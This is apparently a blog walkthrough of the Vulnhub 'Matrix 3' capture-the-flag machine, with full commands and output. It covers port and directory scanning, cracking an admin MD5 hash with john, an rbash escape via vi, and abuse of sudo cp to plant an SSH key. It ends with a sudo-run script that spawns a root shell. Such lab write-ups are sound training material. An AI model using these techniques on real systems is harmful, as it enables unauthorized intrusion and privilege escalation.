Matrix 3 Walkthrough
Description from Vulnhub:
Machine Details: Matrix is a medium level boot2root challenge Series of MATRIX Machines. The OVA has been tested on both VMware and Virtual Box.
Flags: Your Goal is to get root and read /root/flag.txt
Networking: DHCP: Enabled IP Address: Automatically assigned
Hint: Follow your intuitions … and enumerate!
For walkthrough writeup permission or any other query, feel free to contact me on: Twitter: @unknowndevice64 or Email: info[@]ud64.com
I contacted the author via email to get his permission for this walkthrough and he granted it, so everything is fine!
Scanning
I started with the usual port scanning, which revealed 3 open ports.
root :: ~ » nmap -A -sC -sV -p- 192.168.42.230
Nmap scan report for matrix (192.168.42.230)
Host is up (0.00020s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
80/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|_http-title: Welcome in Matrix
6464/tcp open ssh OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 9c:8b:c7:7b:48:db:db:0c:4b:68:69:80:7b:12:4e:49 (RSA)
| 256 49:6c:23:38:fb:79:cb:e0:b3:fe:b2:f4:32:a2:70:8e (ECDSA)
|_ 256 53:27:6f:04:ed:d1:e7:81:fb:00:98:54:e6:00:84:4a (ED25519)
7331/tcp open caldav Radicale calendar and contacts server (Python BaseHTTPServer)
| http-auth:
| HTTP/1.0 401 Unauthorized\x0D
|_ Basic realm=Login to Matrix
MAC Address: 08:00:27:43:E3:86 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hopI typically start with the web server, because it’s most likely to be the entry point. I use a different kind of tools, but lately, I’m getting comfortable with gobuster . It’s pretty fast and the latest update includes a lot of new features. You should definitely check it out!
root :: ~ » gobuster dir -u http://192.168.42.230 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.42.230
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
Starting gobuster
===============================================================
/assets (Status: 301)
/Matrix (Status: 301)
Progress: 95610 / 220561 (43.35%)^C
[!] Keyboard interrupt detected, terminating.
I navigated to the /Matrix directory only to discover a ton of one letter directory is embedded inside each other. I knew, this must be the right path, so I decided to recursively download everything from that directory.
root :: Vulnhub/Matrix3 » wget -r http://192.168.42.230/Matrix/
--2019-07-16 17:11:55-- http://192.168.42.230/Matrix/
Connecting to 192.168.42.230:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 480 [text/html]
Saving to: ‘192.168.42.230/Matrix/index.html’192.168.42.230/Matr 100%[===================>] 480 --.-KB/s in 0s(46.6 MB/s) - ‘192.168.42.230/Matrix/index.html’ saved [480/480]Loading robots.txt; please ignore errors.
http://192.168.42.230/robots.txt
Connecting to 192.168.42.230:80... connected.
HTTP request sent, awaiting response... 404 File not found
2019-07-16 17:11:55 ERROR 404: File not found.http://192.168.42.230/Matrix/4/
Connecting to 192.168.42.230:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 316 [text/html]
Saving to: ‘192.168.42.230/Matrix/4/index.html’192.168.42.230/Matr 100%[===================>] 316 --.-KB/s in 0s(77.5 MB/s) - ‘192.168.42.230/Matrix/4/index.html’ saved [316/316]--- snip ---
I found multiple HTML files in these layered folders. There were quite a few, but I simply printed out every single one to check their contents.
root :: 192.168.42.230/Matrix » find . -type f -exec cat {} \;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html>
<title>Directory listing for /Matrix/d/e/i/</title>
<body>
<h2>Directory listing for /Matrix/d/e/i/</h2>
<hr>
<ul>
</ul>
<hr>
</body>
</html>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html>
<title>Directory listing for /Matrix/d/e/y/</title>
<body>
<h2>Directory listing for /Matrix/d/e/y/</h2>
<hr>
<ul>
</ul>
<hr>
</body>
</html>
--- snip ---I started looking through the output and noticed that one of them contains a reference to an interesting file called secret.gz.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html>
<title>Directory listing for /Matrix/n/e/o/6/4/</title>
<body>
<h2>Directory listing for /Matrix/n/e/o/6/4/</h2>
<hr>
<ul>
<li><a href="secret.gz">secret.gz</a>
</ul>
<hr>
</body>
</html>I copied the URL and downloaded the file. It wasn’t compressed despite the extension.
root :: Vulnhub/Matrix3 » cat secret.gz
admin:76a2173be6393254e72ffa4d6df1030aLook like a username and a hash. Let’s verify it! I copied the hash into a file and counted the characters.
root :: Vulnhub/Matrix3 » cat hash.txt| wc -c
3333 indicated that we’re dealing with an MD5 hash. Time for some password cracking!
root :: Vulnhub/Matrix3 » john hash.txt --format=RAW-MD5
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=3
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
passwd (?)
1g 0:00:00:00 DONE 2/3 2.173g/s 5843p/s 5843c/s 5843C/s chacha..nermal
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completedSuccess! Now, we have the required credentials and we use them to log in on port 7331. After logging in, there is not much to see. Maybe more hidden directories? Only one way to find out… But, what about the authentication you may ask. I captured the login request in Burp Suite, which revealed that the service uses Basic authentication in the header. With this in mind, fire up our trusty gobuster! Just specify the -U switch for username and -P for password and it’ll automatically add the authentication header to every request we send out.
root :: Vulnhub/Matrix3 » gobuster dir -u http://192.168.42.230:7331 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -U admin -P passwd
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.42.230:7331
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Auth User: admin
[+] Timeout: 10s
===============================================================
Starting gobuster
===============================================================
/data (Status: 301)
/assets (Status: 301)
Progress: 2567 / 220561 (1.16%)^C
[!] Keyboard interrupt detected, terminating.I got another interesting directory called data . Sweet, a binary file!
root :: ~/Downloads » file data
data: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS WindowsI discovered that the executable is for Windows and was probably written in C#. The strings command didn’t show anything useful, so I copied it to my Windows machine and opened the file with ILSpy, which is a handy .NET decompiler.
Alright, I think we’re progressing pretty well. These are the login credentials for the SSH service.
SSH Access
root :: Vulnhub/Matrix3 » ssh guest@192.168.42.230 -p 6464
The authenticity of host '[192.168.42.230]:6464 ([192.168.42.230]:6464)' can't be established.
ECDSA key fingerprint is SHA256:BMhLOBAe8UBwzvDNexM7vC3gv9ytO1L8etgkkIL8Ipk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.42.230]:6464' (ECDSA) to the list of known hosts.
guest@192.168.42.230's password:
Last login: Thu Apr 4 10:24:06 2019 from 192.168.56.103
guest@matrix:~$ ls
-rbash: /bin/ls: restricted: cannot specify `/' in command namesNot so fast though… We’re in a restricted shell called rbash . Fortunately, it’s easy to escape. I mean relatively. The $PATH environment variable is changed to the /home/guest/prog and I can’t figure out what is inside it because of the lack of commands. I was trying different escape techniques and I got lucky with the vi editor. I typed :!/bin/bash instead of the :wq reflex 😄 It worked! After that, my first thing was to change the $PATH variable back and make the shell usable.
guest@matrix:~$ echo $PATH
/home/guest/prog
guest@matrix:~$ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binPrivilege Escalation
With the help of a little enumeration, I found out that we can run the /bin/cp command as trinity without the password. Now, how to turn this to our advantage? I admit I had to think a little bit…but now it's obvious.
guest@matrix:~$ sudo -l
User guest may run the following commands on matrix:
(root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper
(trinity) NOPASSWD: /bin/cpWe can use this to generate a new SSH key pair and copy the public key to trinity’s authorized_keys file. This way, we can switch user and escalate our privileges without a password.
guest@matrix:~/.ssh$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/guest/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/guest/.ssh/id_rsa.
Your public key has been saved in /home/guest/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:J54RvTiYeg9rIM4zQr7ML3S/6ad3mDuNDKRfszmPkpY guest@matrix
The key's randomart image is:
+---[RSA 2048]----+
| |
| . |
| . . |
| . o o . |
| o o S o |
| o.o.o + * |
|+o..+.O @ |
|+o= Eo/.o |
| =++o*BoB. |
+----[SHA256]-----+
guest@matrix:~/.ssh$ ls -la
total 20
drwx------ 2 guest users 4096 Jul 16 23:15 ./
drwxr-xr-x 18 guest users 4096 Apr 3 13:18 ../
-rw------- 1 guest users 1679 Jul 16 23:15 id_rsa
-rw-r--r-- 1 guest users 394 Jul 16 23:15 id_rsa.pub
-rw-r--r-- 1 guest users 171 Aug 6 2018 known_hosts
guest@matrix:~/.ssh$ chmod 777 id_rsa.pub
guest@matrix:~/.ssh$ cd ..
guest@matrix:~$ cd Documents/
guest@matrix:~/Documents$ cp ~/.ssh/id_rsa.pub .
guest@matrix:~/Documents$ sudo -u trinity /bin/cp id_rsa.pub /home/trinity/.ssh/authorized_keys
guest@matrix:~/Documents$ ssh trinity@localhost -p 6464
Last login: Mon Aug 6 16:37:45 2018 from 192.168.56.102
trinity@matrix:~$Getting Root Access
We’re one step close to root access, but we are not there yet. As you can see, trinity can run the /home/trinity/oracle command as root without a password. However, the file is not there.
trinity@matrix:~$ sudo -l
User trinity may run the following commands on matrix:
(root) NOPASSWD: /home/trinity/oracle
trinity@matrix:~$ ls -la
total 72
drwxr-xr-x 14 trinity trinity 4096 Apr 3 06:48 ./
drwxr-xr-x 7 root root 4096 Aug 6 2018 ../
-rw------- 1 trinity trinity 52 Aug 6 2018 .Xauthority
-rw------- 1 trinity trinity 6 Apr 3 14:44 .bash_history
drwxr-xr-x 5 trinity trinity 4096 Aug 6 2018 .cache/
drwxr-xr-x 11 trinity trinity 4096 Aug 6 2018 .config/
drwx------ 3 trinity trinity 4096 Aug 6 2018 .dbus/
-rw------- 1 trinity trinity 16 Aug 6 2018 .esd_auth
-rw-r--r-- 1 trinity trinity 3729 Oct 23 2017 .screenrc
drwxr-xr-x 2 trinity trinity 4096 Jul 16 23:18 .ssh/
drwx------ 4 trinity trinity 4096 Aug 6 2018 .thumbnails/
drwxr-xr-x 2 trinity trinity 4096 Aug 6 2018 Desktop/
drwxr-xr-x 2 trinity trinity 4096 Aug 6 2018 Documents/
drwxr-xr-x 2 trinity trinity 4096 Aug 6 2018 Downloads/
drwxr-xr-x 2 trinity trinity 4096 Aug 6 2018 Music/
drwxr-xr-x 2 trinity trinity 4096 Aug 6 2018 Pictures/
drwxr-xr-x 2 trinity trinity 4096 Aug 6 2018 Public/
drwxr-xr-x 2 trinity trinity 4096 Aug 6 2018 Videos/It’s easy! Just create a simple shell script executing the bash program and since we are going to run it as root, we’ll get a root shell. Piece of cake!
I opened up the vi editor one more time to create this oracle file. Don’t forget to make it executable, otherwise, it doesn’t work!
trinity@matrix:~$ cat oracle
/bin/bash
trinity@matrix:~$ sudo /home/trinity/oracle
sudo: /home/trinity/oracle: command not found
trinity@matrix:~$ chmod +x oracle
trinity@matrix:~$ sudo /home/trinity/oracle
root@matrix:/home/trinity# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
root@matrix:/home/trinity# whoami
rootThe Flag
Finally, the most important thing is to print out the flag for the sake of our satisfaction and joy.
root@matrix:~# cat flag.txt,----------------, ,---------,
,-----------------------, ," ,"|
," ,"| ," ," |
+-----------------------+ | ," ," |
| .-----------------. | | +---------+ |
| | | | | | -==----'| |
| | Matrix is | | | | | |
| | compromised | | |/----|`---= | |
| | C:\>_reload | | | ,/|==== ooo | ;
| | | | | // |(((( [33]| ,"
| `-----------------' |," .;'| |(((( | ,"
+-----------------------+ ;; | | |," -morpheus AKA (unknowndevice64)-
/_)______________(_/ //' | +---------+
___________________________/___ `,
/ oooooooooooooooo .o. oooo /, \,"-----------
/ ==ooooooooooooooo==.o. ooo= // ,`\--{)B ,"
/_==__==========__==_ooo__ooo=_/' /___________,"
`-----------------------------'-[ 7h!5 !5 n07 7h3 3nd, m47r!x w!11 r37urn ]-
Before You Go
Thank you for taking the time to read my walkthrough. If you found it helpful, please hit the 👏 button 👏 (up to 50x) and share it to help others with similar interest find it! + Feedback is always welcome! 🙏
